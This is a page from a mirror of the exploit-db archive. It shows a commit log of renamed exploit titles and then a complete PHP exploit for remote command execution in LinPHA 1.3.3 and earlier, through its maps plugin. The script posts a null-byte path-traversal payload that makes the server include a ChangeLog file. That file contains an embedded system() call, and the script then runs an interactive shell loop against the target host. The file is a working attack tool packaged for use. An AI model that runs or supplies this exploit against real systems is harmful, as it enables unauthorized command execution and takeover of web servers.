bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/5392.php
Offensive Security b22e31535e DB: 2016-11-18 
3 new exploits

Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)
Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)

Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)
NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)

Apple Mac OSX 10.4.x Kernel -  i386_set_ldt() Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)

Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)

WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)
Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)

Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)

Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
WinAmp 5.63 - Invalid Pointer Dereference
WinAmp 5.63 - Stack Based Buffer Overflow
Winamp 5.63 - Invalid Pointer Dereference
Winamp 5.63 - Stack Based Buffer Overflow

Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)
Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)

Microsoft Edge - 'eval' Type Confusion

Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow
NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow
SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation
SCO UnixWare Reliant HA - Privilege Escalation
SCO UnixWare Merge - mcd Privilege Escalation
Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow
SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation
SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation
SCO UnixWare Merge - 'mcd' Privilege Escalation

Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.572 - whatsnew.txt Stack Overflow
Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)
Winamp 5.572 - 'whatsnew.txt' Stack Overflow
Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow

Winamp 5.572 - whatsnew.txt SEH (Metasploit)
Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)

Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)
Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)

Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking
NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking

WinAmp 5.63 - (winamp.ini) Local Exploit
Winamp 5.63 - 'winamp.ini' Local Exploit

Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)

Nullsoft Winamp 2.x - AIP Buffer Overflow
NullSoft Winamp 2.x - AIP Buffer Overflow

Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow
NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow

winamp Web interface 7.5.13 - Multiple Vulnerabilities
Winamp Web interface 7.5.13 - Multiple Vulnerabilities

Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow
NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow

LinPHA 1.3.1 - (new_images.php) Blind SQL Injection
LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection

KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection
KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection

KwsPHP 1.0 - Newsletter Module SQL Injection
KwsPHP 1.0 Module Newsletter - SQL Injection
DaZPHP 0.1 - (prefixdir) Local File Inclusion
PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion
KwsPHP Module Galerie - (id_gal) SQL Injection
KwsPHP Module Archives - 'id' SQL Injection
KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection
KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection
XPOZE Pro 3.05 - (reed) SQL Injection
Vastal I-Tech Software Zone - 'cat_id' SQL Injection
sabros.us 1.75 - (thumbnails.php) Remote File Disclosure
Comdev News Publisher - SQL Injection
Affiliate Directory - 'cat_id' SQL Injection
PHP Photo Gallery 1.0 - (photo_id) SQL Injection
Blogator-script 0.95 - (incl_page) Remote File Inclusion
PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection
Blogator-script 0.95 - (id_art) SQL Injection
Dragoon 0.1 - (lng) Local File Inclusion
DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion
PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion
KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection
KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection
KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection
KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection
XPOZE Pro 3.05 - 'reed' Parameter SQL Injection
Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection
Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure
Comdev News Publisher 4.1.2 - SQL Injection
Affiliate Directory - 'cat_id' Parameter SQL Injection
PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection
Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion
PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection
Blogator-script 0.95 - 'id_art' Parameter SQL Injection
Dragoon 0.1 - 'lng' Parameter Local File Inclusion
Easynet Forum Host - 'forum.php forum' SQL Injection
CoBaLT 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' SQL Injection
Easynet Forum Host - 'forum.php' SQL Injection
Cobalt 0.1 - Multiple SQL Injections
Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection
Links Directory 1.1 - 'cat_id' SQL Injection
Software Index 1.1 - 'cid' SQL Injection
Links Directory 1.1 - 'cat_id' Parameter SQL Injection
Software Index 1.1 - 'cid' Parameter SQL Injection
Blog PixelMotion - 'index.php categorie' SQL Injection
Site Sift Listings - 'id' SQL Injection
Blog PixelMotion - 'categorie' Parameter SQL Injection
Site Sift Listings - 'id' Parameter SQL Injection

Prozilla Forum Service - 'forum.php forum' SQL Injection
Prozilla Forum Service - 'forum' Parameter SQL Injection

Prozilla Freelancers - (project) SQL Injection
Prozilla Freelancers - 'project' Parameter SQL Injection
LinPHA 1.3.3 - (maps plugin) Remote Command Execution
Dragoon 0.1 - (root) Remote File Inclusion
LinPHA 1.3.3 Plugin Maps - Remote Command Execution
Dragoon 0.1 - 'root' Parameter Remote File Inclusion

k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
k-links directory - SQL Injection / Cross-Site Scripting

SFS Affiliate Directory - 'id' SQL Injection
Affiliate Directory - 'id' Parameter SQL Injection

SFS EZ Gaming Directory - 'Directory.php id' SQL Injection
SFS EZ Gaming Directory - 'directory.php' SQL Injection

SFS EZ Gaming Directory - 'cat_id' SQL Injection
SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection

LinPHA 1.3.2 - (rotate.php) Remote Command Execution
LinPHA 1.3.2 - 'rotate.php' Remote Command Execution

cobalt qube webmail 1.0 - Directory Traversal
Cobalt Qube Webmail 1.0 - Directory Traversal
LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion
LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion
LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion

LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities

Drake CMS 0.2 - 'index.php' Cross-Site Scripting

Sabros.US 1.7 - 'index.php' Cross-Site Scripting

Drake CMS 0.3.7 - 404.php Local File Inclusion
Drake CMS 0.3.7 - '404.php' Local File Inclusion

Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting

Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting

CoBaLT 2.0 - 'adminler.asp' SQL Injection
Cobalt 2.0 - 'adminler.asp' SQL Injection

VisualPic 0.3.1 - Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting
LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting

Software Index - 'signinform.php' Cross-Site Scripting

CMSimple 4.4.4 - Remote file Inclusion
CMSimple 4.4.4 - Remote File Inclusion
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
2016-11-18 05:01:22 +00:00

136 lines
4.8 KiB
PHP
Executable file
Raw Blame History

<?php
/*
--------------------------------------------------------------
LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://linpha.sourceforge.net
details..: works with magic_quotes_gpc = off
[-] LFI found by rgod in /plugins/maps/map.main.class.php
20. if(!defined('TOP_DIR')) { define('TOP_DIR','../'); }
21.
22. $type = read_config('maps_type');
23.
24. require_once(TOP_DIR."/plugins/maps/$type/$type.class.php"); <== LFI
25. require_once(TOP_DIR.'/plugins/maps/geocode.class.php');
26. include_once(TOP_DIR.'/plugins/maps/location.class.php');
an attacker could be include an arbitrary local file through the require_once() at
line 24 cause is possible to modify 'maps_type' config value by another script:
[-] look at /plugins/maps/db_handler.php
112. if(@ $_POST['job'] == "settings")
113. {
114. update_config($_POST['maps_yahoo_id'], 'maps_yahoo_id' );
115. update_config($_POST['maps_google_key'], 'maps_google_key');
116. update_config($_POST['maps_type'], 'maps_type'); <== 'maps_type' value updating
117. update_config($_POST['maps_display_type'], 'maps_display_type');
118. update_config($_POST['maps_google_ctrl_size'], 'maps_google_ctrl_size');
119. update_config($_POST['maps_default_zoom'], 'maps_default_zoom');
120. update_config($_POST['maps_default_zoom_location'], 'maps_default_zoom_location');
121. update_config($_POST['maps_yahoo_type_control'], 'maps_yahoo_type_control');
122. update_config($_POST['maps_yahoo_pan_control'], 'maps_yahoo_pan_control');
123. update_config($_POST['maps_yahoo_slide_control'], 'maps_yahoo_slide_control');
124. update_config($_POST['maps_marker_auto_popup'], 'maps_marker_auto_popup');
125.
126. header("Location: ".TOP_DIR."/admin.php?page=maps&plugins=1");
127. }
and now we need a file to include...what do you think about ChangeLog?
[-] ChangeLog file:
393. ###############################################
394. ### ###
395. ### LinPHA 1.1.0 RELEASE! ###
396. ### ###
397. ###############################################
398.
399. 2006-02-19 bzrudi71 <linpha_AT_tuxpower_DOT_de>
400. * tagged LinPHA linpha_1_1_0 :-)
401.
402. 2006-02-18 flo
403. * fixed linpha vulnerability found on secunia.com
404. + docs/index.php and install/*
405. include($lang) fixed
406. + plugins/log/logger.class.php
407. use htmlspecialchars() before write logger events to database or to text file
408. for example:
409. User <?php echo system($_GET['cwd']); ?>: login failed! <== oops! ;)
410. will be replaced by:
411. User <?php echo system($_GET[&#039;cwd&#039;]); ?>: login failed!
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from ".$host.":80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------------------+";
print "\n| LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit by EgiX |";
print "\n| - bug (LFI) found by rgod |";
print "\n+------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to Linpha directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "job=settings&maps_type=%2E%2E/%2E%2E/ChangeLog%00";
$packet = "POST {$path}plugins/maps/db_handler.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet);
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nlinpha-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}maps_view.php?cwd=".urlencode($cmd)." HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$resp = http_send($host, $packet);
if (!ereg("ChangeLog", $resp)) die("\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
preg_match("/User (.*): login failed!\n /s", $resp, $shell);
print "\n{$shell[1]}\n";
}
else break;
}
?>
# milw0rm.com [2008-04-07]
Reference in a new issue View git blame Copy permalink